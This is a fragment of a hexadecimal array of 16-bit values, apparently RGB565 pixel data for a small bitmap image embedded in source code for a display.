0xffff, 0xffde, 0xfffe, 0xf7ff, 0xc7df, 0x23d4, 0x3cb7, 0xcfff, 0xefff, 0xfffe, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffbf, 0xffdf, 0xffdf, 0xffff, 0xf7fe, 0xc77f, 0x1313, 0x0b36, 0x1337, 0x1318, 0x1b5a, 0x12b4, 0xb6de, 0xf7ff, 0xf7ff, 0x5bb5, 0x12d6, 0x0b59, 0x0338, 0x1315, 0x5458, 0xa73f, 0x1b97, 0x0af5, 0x3b52, 0xffff, 0xfffe, 0xf7fe, 0xefff, 0x963a, 0x1b51, 0x767f, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xfffe, 0xf7fe, 0xf7ff, 0xf7df, 0xffdf, 0xffff, 0xbedd, 0x22f2, 0x12d5, 0x0a10, 0x95dc, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffde, 0xffff, 0xffff, 0xffff, 0xd73f, 0x1a90, 0x1b35, 0x0271, 0x8d9a, 0xf7ff, 0xfffe, 0xffff, 0x2bb7, 0x12f5, 0x1b36, 0x2315, 0x2313, 0x1b35, 0x0ad4, 0x64d9, 0xf7ff, 0xfffd, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffde, 0xfffe, 0xae3a, 0x0291, 0x0399, 0x02d5, 0x853a, 0xffff, 0xffbd, 0xf7ff, 0xf7df, 0xffff, 0xffdf, 0xffdf, 0xffbf, 0xffdf, 0xbe7e, 0x01af, 0x1272, 0x74b7, 0xefff, 0x4bb3, 0x0a93, 0x1358, 0x0b58, 0x1317, 0x1b37, 0x0b36, 0x1379, 0x0b78, 0x0356, 0x0377, 0x0378, 0x0b59, 0x0ad5, 0x2b32, 0xd7ff, 0x95bc, 0x016c, 0x120e, 0x963d, 0xefdf, 0xf7ff, 0xf7df, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xf7ff, 0xefff, 0xe7ff, 0x8df9, 0x1af1, 0x7e9f, 0xf7ff, 0xffde, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0x6bd0, 0xa67c, 0xdfff, 0xdf9f, 0xc6de, 0xa65b, 0xb71f, 0xd7bf, 0xf7ff, 0xfffc, 0xd75f, 0x01d3, 0x12f9, 0x0ab3, 0x8e1c, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffdf, 0xefff, 0x5cb7, 0x0ad4, 0x0b19, 0xe75c, 0xefff, 0xf7ff, 0xffdc, 0xffde, 0xdfff, 0x2c98, 0x1c16, 0xd7df, 0xffdd, 0xfffe, 0xf7ff, 0xf7ff, 0xffdf, 0xffff, 0xffff,
0xffff, 0xffbf, 0xffdf, 0xffff, 0xcfff, 0x23d4, 0x3c77, 0xc7ff, 0xf7ff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xf7be, 0xefff, 0xc7bf, 0x1333, 0x1375, 0x1356, 0x1339, 0x02d9, 0x1af6, 0xc77f, 0xeffe, 0xefff, 0x6477, 0x02d5, 0x0b58, 0x0358, 0x1357, 0x0ad4, 0x0293, 0x0357, 0x0b36, 0x3b52, 0xf7ff, 0xffff, 0xefde, 0xe7ff, 0x8dfb, 0x2311, 0x8ebf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xdfbf, 0x128f, 0x12d4, 0x0252, 0x8dbc, 0xefff, 0xffdc, 0xffde, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xffff, 0xdfbf, 0x124f, 0x12f4, 0x022f, 0xa63c, 0xffff, 0xffdf, 0x1af2, 0x12b3, 0x43d8, 0xd7ff, 0xcfff, 0x2334, 0x0ab3, 0x64da, 0xf7ff, 0xffdd, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffde, 0xfffe, 0xa61a, 0x0272, 0x039a, 0x02f6, 0x6cf9, 0xf7ff, 0xfffd, 0xf7ff, 0xffff, 0xf7df, 0xf7df, 0xffff, 0xffdf, 0xf77f, 0x5310, 0x5c98, 0x6498, 0xc69c, 0xffff, 0xefdf, 0x4bf5, 0x0271, 0x12f4, 0x1b76, 0x1356, 0x1357, 0x0b58, 0x0338, 0x1b99, 0x1b58, 0x1b38, 0x0a53, 0x3b52, 0xe7ff, 0xf7ff, 0xb67e, 0x853c, 0x5c17, 0x4350, 0xdf9f, 0xefdf, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xefff, 0x9e1a, 0x1b32, 0x6e5f, 0xf7ff, 0xffdd, 0xffdd, 0xffdf, 0xffff, 0xffdf, 0xffdf, 0x5330, 0x09cc, 0x4b92, 0xffff, 0xfffd, 0xffff, 0xefff, 0xf7ff, 0xffdc, 0xfffc, 0xd79f, 0x12b5, 0x1338, 0x0250, 0x9dfa, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xfffd, 0xfffe, 0xf7ff, 0x64d4, 0x0a6f, 0x1b36, 0xef7c, 0xefff, 0xefff, 0xfffd, 0xffdd, 0xd7ff, 0x2c79, 0x13f6, 0xd7ff, 0xffdd, 0xfffd, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff,
0xffdf, 0xffdf, 0xffdf, 0xf7ff, 0xd7ff, 0x3c76, 0x23b4, 0xc7df, 0xf7ff, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xfffe, 0xffff, 0xf7fe, 0xfffe, 0xfffe, 0xf7ff, 0xc6ff, 0x1a93, 0x1b36, 0x0334, 0x0395, 0x0378, 0x13bb, 0x0a94, 0x1a0d, 0xefff, 0xe7ff, 0x6cf8, 0x02f5, 0x0b78, 0x1379, 0x0b37, 0x1398, 0x0337, 0x0b58, 0x0272, 0x7518, 0xf7df, 0xffff, 0xefff, 0xdfff, 0x5cf8, 0x2332, 0xaf3f, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7fe, 0xffff, 0xffff, 0xf7ff, 0xcf7f, 0x0a2e, 0x2354, 0x0250, 0x8ddb, 0xefff, 0xf7df, 0xffde, 0xffde, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffbf, 0xffdf, 0xffdf, 0xf7ff, 0xdfbf, 0x22d1, 0x12f4, 0x0250, 0x8d9a, 0xf7ff, 0x95fb, 0x11ec, 0x5bd4, 0xefff, 0xdfbf, 0x3353, 0x0a93, 0x64ba, 0xf7ff, 0xfffd, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0x95db, 0x0274, 0x037a, 0x02f6, 0x5cb8, 0xefff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xefff, 0xf7ff, 0xfffe, 0xf7bd, 0xffff, 0xefff, 0xefff, 0xffde, 0xffbd, 0xf7ff, 0xe7ff, 0x8ddb, 0x22af, 0x026f, 0x0b13, 0x02f5, 0x0b57, 0x02d6, 0x1295, 0x09d2, 0x09d0, 0x85bb, 0xe7ff, 0xffff, 0xff9e, 0xf7ff, 0xefff, 0xefff, 0xffff, 0xefde, 0xf7ff, 0xf7ff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xae9c, 0x1b33, 0x4ddf, 0xf7fe, 0xfffd, 0xfffe, 0xffdf, 0xffff, 0xffdf, 0xffff, 0x4b74, 0x1295, 0x3315, 0xf7df, 0xff9b, 0xffbc, 0xf7df, 0xffff, 0xffbc, 0xffff, 0xd7bf, 0x01cd, 0x1ab1, 0x4392, 0xc6dc, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffd, 0xfffc, 0xf7fe, 0x9e18, 0x3b50, 0x09ee, 0xef3b, 0xf7ff, 0xf7ff, 0xfffd, 0xffdd, 0xcfdf, 0x1c38, 0x2479, 0xd7ff, 0xffde, 0xffdd, 0xf7ff, 0xf7ff, 0xfffe, 0xffff, 0xf7ff,
0xf7fe, 0xffff, 0xffff, 0xffff, 0xdfff, 0x5d59, 0x1373, 0xaf3f, 0xf7ff, 0xffdf, 0xffbf, 0xffdf, 0xffdf, 0xffde, 0xfffe, 0xffff, 0xf7fe, 0xf7ff, 0xdf9f, 0x7cf9, 0x09f2, 0x1ad7, 0x1358, 0x0bb7, 0x0396, 0x0376, 0x0315, 0x22d2, 0xb6bf, 0xe7ff, 0x7519, 0x0a90, 0x0398, 0x0b58, 0x0af6, 0x1b98, 0x0336, 0x1bd8, 0x0a92, 0x22d1, 0xd77f, 0xffff, 0xffbd, 0xf7ff, 0xd7ff, 0x4476, 0x2353, 0xcfff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xc73f, 0x0a90, 0x1313, 0x0a70, 0xa63c, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffde, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xdf9f, 0x1ab1, 0x0ad4, 0x0a71, 0x753a, 0xe7ff, 0xa5fa, 0x4acd, 0xffff, 0xf7ff, 0x32f1, 0x0a72, 0x6d1b, 0xf7ff, 0xfffd, 0xffff, 0xf7ff, 0xf7ff, 0xfffe, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xf7ff, 0x959a, 0x0211, 0x0ab5, 0x0ab3, 0x64b6, 0xefff, 0xf7fe, 0xff9c, 0xffde, 0xffff, 0xf7ff, 0xf7fe, 0xf7fd, 0xfffe, 0xffde, 0xffdd, 0xfffc, 0xfffd, 0xffff, 0x9598, 0x5c55, 0xdfff, 0xdfff, 0x9ede, 0x5496, 0x3c37, 0x2bb6, 0x3bd7, 0x74db, 0xadfe, 0xdfdf, 0xd7ff, 0x6452, 0xadd8, 0xffdf, 0xffdf, 0xffff, 0xfffe, 0xffdd, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffde, 0xfffe, 0xffff, 0xcf7f, 0x1353, 0x2d5e, 0xf7fe, 0xfffd, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0x3b75, 0x0297, 0x2338, 0xefff, 0xffbd, 0xffdd, 0xffff, 0xefdf, 0xf7ff, 0xffff, 0xd73e, 0x8536, 0xdfff, 0xe7ff, 0xdf7f, 0xe79f, 0xd79f, 0xd79f, 0xd79f, 0xdfbf, 0xdf9f, 0xe79e, 0xe7bf, 0xdfdf, 0xbeff, 0xf75d, 0xf7ff, 0xf7ff, 0xffdd, 0xfffe, 0xbf7f, 0x13f7, 0x34da, 0xd7ff, 0xfffe, 0xffdd, 0xffff, 0xffff, 0xfffe, 0xffff, 0xf7ff,
0xfffe, 0xf7ff, 0xffff, 0xfffe, 0xefff, 0x865b, 0x1393, 0x75fc, 0xefff, 0xffde, 0xffdd, 0xffff, 0xffff, 0xfffe, 0xf7ff, 0xefff, 0xe79f, 0x8517, 0x22b1, 0x0a93, 0x2399, 0x1358, 0x0338, 0x0378, 0x0b98, 0x1355, 0x124f, 0xbeff, 0xdfff, 0x753b, 0x0293, 0x0b37, 0x1399, 0x0ad5, 0x1294, 0x12b3, 0x0a71, 0x0a2e, 0x4372, 0xc6fe, 0xf7ff, 0xffbe, 0xfffe, 0xffff, 0xbf9f, 0x1b93, 0x3456, 0xcfff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xfffe, 0xf7ff, 0xc75f, 0x1271, 0x1314, 0x028f, 0x9e1a, 0xffff, 0xffff, 0xffff, 0xefff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xfffe, 0xf7ff, 0xdfff, 0x1a90, 0x12f4, 0x0293, 0x95b8, 0xe7ff, 0xbe7b, 0xffff, 0xefdf, 0x2ad1, 0x0ab4, 0x5cfb, 0xefff, 0xfffe, 0xf7ff, 0xefff, 0xf7ff, 0xfffd, 0xffde, 0xffdf, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xf7df, 0xffdf, 0xffdf, 0xffff, 0x9557, 0x53b3, 0x859c, 0x6477, 0x7494, 0xf7ff, 0xfffe, 0xff9e, 0xffbd, 0xffde, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffde, 0xffdd, 0xfffd, 0xefff, 0x8dbb, 0x09ce, 0x11ec, 0xdfdf, 0xefff, 0xefff, 0xdfff, 0xd7ff, 0xdfff, 0xf7ff, 0xf7ff, 0xdfdf, 0x22ae, 0x122e, 0x6c14, 0xffff, 0xf7de, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffde, 0xffff, 0xe7ff, 0x1b94, 0x149b, 0xefde, 0xf7de, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0x3b74, 0x0337, 0x1357, 0xdfff, 0xffff, 0xffff, 0xefff, 0xe7ff, 0xf7ff, 0xffdf, 0xffff, 0xf7ff, 0xbebe, 0x4332, 0x226f, 0x1a6f, 0x1ad1, 0x1b14, 0x12f4, 0x2315, 0x22b1, 0x328f, 0x2a2e, 0x3ad2, 0xa65f, 0xffff, 0xf7df, 0xffff, 0xffde, 0xffff, 0x967c, 0x1395, 0x5d7c, 0xdfff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xffff, 0xf7ff,
0xf7fe, 0xf7ff, 0xffff, 0xffdd, 0xfffd, 0xc7bf, 0x0b52, 0x3457, 0xe7ff, 0xffdd, 0xffbc, 0xffff, 0xefde, 0xf7ff, 0xdfdf, 0x5c77, 0x32b1, 0x1a73, 0x1338, 0x0b78, 0x0316, 0x0b77, 0x0b78, 0x0b58, 0x0af5, 0x124f, 0xd77f, 0xefff, 0x74f8, 0x022f, 0x1377, 0x0b5a, 0x0251, 0x5459, 0xb71f, 0x7d5c, 0x8ddc, 0xb6bd, 0xefff, 0xf7ff, 0xffff, 0xffdf, 0xffde, 0xf7ff, 0x865d, 0x0b74, 0x6dba, 0xdfff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xf7ff, 0xcf7f, 0x1250, 0x2337, 0x0230, 0x8dd9, 0xf7fe, 0xffde, 0xff9f, 0xffff, 0xf7ff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7fe, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xd75f, 0x22d1, 0x1315, 0x122d, 0x859b, 0xdfff, 0xefff, 0xe7df, 0x3333, 0x0ab5, 0x64db, 0xefff, 0xfffd, 0xfffe, 0xf7ff, 0xf7ff, 0xfffd, 0xfffe, 0xffdf, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xf7df, 0xefff, 0xc73f, 0x95bb, 0xae5e, 0xefff, 0xf7ff, 0xffdf, 0xff9f, 0xffde, 0xffdd, 0xffff, 0xffbf, 0xffdf, 0xf7bf, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0x6456, 0x1a0f, 0xae7e, 0xefff, 0xffff, 0xffff, 0x42ac, 0x5bb2, 0x4aed, 0xf7fd, 0xfffb, 0xefff, 0xae9f, 0x1a51, 0x4b72, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7df, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xf7ff, 0x4477, 0x03d6, 0xbedd, 0xefff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffdf, 0xffdf, 0x43b5, 0x0314, 0x0b74, 0x64d6, 0x7cd5, 0x7d16, 0x64d6, 0x6496, 0x7c74, 0x8c96, 0xefdf, 0xc6df, 0x19ed, 0x22b2, 0x861f, 0x655d, 0x02b3, 0x0b38, 0x0b7a, 0x02d7, 0x0a73, 0x6c99, 0x9e1f, 0x32f4, 0x01af, 0xa5fa, 0xf7ff, 0xffdf, 0xf7df, 0xe7ff, 0x5d17, 0x0b11, 0xa6ff, 0xe7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff,
0xf7fe, 0xf7ff, 0xffff, 0xffdc, 0xfffc, 0xe7ff, 0x2c38, 0x0b96, 0xaf3f, 0xf7ff, 0xfffe, 0xf7ff, 0xe7ff, 0x5453, 0x020f, 0x12b7, 0x1af6, 0x1359, 0x0b59, 0x0336, 0x13b8, 0x0b58, 0x0b38, 0x1316, 0x1ad0, 0xd7bf, 0xe7ff, 0x6437, 0x1250, 0x12b1, 0x0250, 0x0230, 0x6c34, 0xe7ff, 0xdfff, 0xd7ff, 0xdfff, 0xefff, 0xffff, 0xfffe, 0xf7df, 0xffdf, 0xffff, 0xe7ff, 0x2bd4, 0x13b5, 0xaf1f, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xcf5f, 0x01ee, 0x2356, 0x0210, 0xa67e, 0xf7ff, 0xffff, 0xffbe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xefde, 0xffff, 0xf7fe, 0xf7ff, 0xdfbf, 0x2ab0, 0x1ad3, 0x0a11, 0x7d5b, 0xe7ff, 0xe7ff, 0x2290, 0x0a33, 0x6cdb, 0xf7ff, 0xffdc, 0xfffd, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7fe, 0xfffe, 0xffde, 0xf7bf, 0xefff, 0x5c14, 0x01cd, 0x01ef, 0x1252, 0x2af2, 0xe7ff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xf7de, 0xffff, 0xffdf, 0xffdf, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0x6bf2, 0xdfbf, 0xefff, 0xffff, 0xffdd, 0xf7bf, 0x9d9a, 0x19ab, 0x7c94, 0xf7fe, 0xf7fb, 0xfffd, 0xf7ff, 0xe7bf, 0x6c33, 0xe7bf, 0xf7ff, 0xf7df, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffbf, 0xf7ff, 0x863d, 0x03b5, 0x7559, 0xe7ff, 0xefff, 0xeffe, 0xffff, 0xffff, 0xffff, 0x4373, 0x0af5, 0x0b55, 0x0a4d, 0x1a6d, 0x12b1, 0x0ad3, 0x1a90, 0x29e9, 0x228d, 0xc79f, 0x4374, 0x2af3, 0xcfff, 0x5435, 0xb77f, 0xa71f, 0x0275, 0x0b39, 0x02b5, 0x965f, 0xbf5f, 0x4bb3, 0xdfff, 0x3b73, 0x22af, 0xefdf, 0xf7bf, 0xf7ff, 0xc7df, 0x2c13, 0x2bb2, 0xdfff, 0xefff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff,
